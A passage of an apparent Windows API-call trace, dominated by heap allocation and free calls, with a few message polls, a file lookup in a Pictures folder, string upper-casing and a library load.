dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0255.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0255.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0255.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0255.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0255.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0255.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0255.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0255.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0255.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0255.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0255.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0255.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0255.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0255.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0255.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0255.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0255.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0255.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0255.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0255.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0255.082] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0255.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0255.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0255.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0255.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0255.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0255.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0255.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0255.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0255.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0255.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0255.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0255.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0255.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0255.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0255.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0255.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0255.083] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0255.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0255.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0255.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0255.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0255.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0255.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0255.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0255.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0255.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1818 [0255.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0255.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0255.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0255.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0255.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0255.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0255.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0255.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0255.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0255.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0255.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0255.084] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures/FSvM9zg.png", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9bb25a0, ftCreationTime.dwHighDateTime=0x1d4d05b, ftLastAccessTime.dwLowDateTime=0xb8b24da0, ftLastAccessTime.dwHighDateTime=0x1d4d06e, ftLastWriteTime.dwLowDateTime=0xb8b24da0, ftLastWriteTime.dwHighDateTime=0x1d4d06e, nFileSizeHigh=0x0, nFileSizeLow=0x7712, dwReserved0=0xa8e0047, dwReserved1=0x1d684, cFileName="FSvM9zg.png", cAlternateFileName="")) returned 0xaa57a0 [0255.085] FindClose (in: hFindFile=0xaa57a0 | out: hFindFile=0xaa57a0) returned 1 [0255.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0255.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0255.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0255.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0255.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0255.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0255.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0255.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0255.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0255.085] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0255.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0255.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0255.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0255.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0255.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0255.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0255.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0255.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0255.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0255.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0255.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0255.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0255.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0255.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0255.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0255.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0255.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0255.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0255.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0255.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0255.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0255.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0255.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0255.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0255.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0255.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0255.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0255.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0255.087] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.087] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0255.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0255.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0255.087] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0255.087] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0255.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0255.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0255.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0255.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0255.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0255.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0255.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0255.088] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0255.088] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.088] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0255.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0255.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0255.088] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0255.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0255.088] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0255.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0255.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0255.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0255.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0255.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0255.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0255.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0255.089] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0255.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0255.089] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0255.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0255.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0255.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0255.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0255.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0255.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0255.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0255.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0255.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0255.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0255.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0255.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0255.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0255.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0255.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0255.090] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0255.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0255.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0255.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0255.090] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0255.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0255.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0255.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0255.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0255.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0255.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0255.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0255.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0255.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0255.091] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0255.091] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.092] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0255.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0255.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0255.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0255.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0255.092] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0255.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0255.092] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0255.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0255.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0255.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0255.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0255.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0255.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0255.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0255.093] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0255.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0255.093] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0255.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0255.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0255.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0255.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0255.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0255.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0255.093] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0255.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0255.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0255.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0255.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0255.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0255.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0255.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0255.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0255.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0255.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0255.094] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0255.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0255.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0255.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0255.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0255.094] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0255.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0255.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0255.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0255.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0255.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 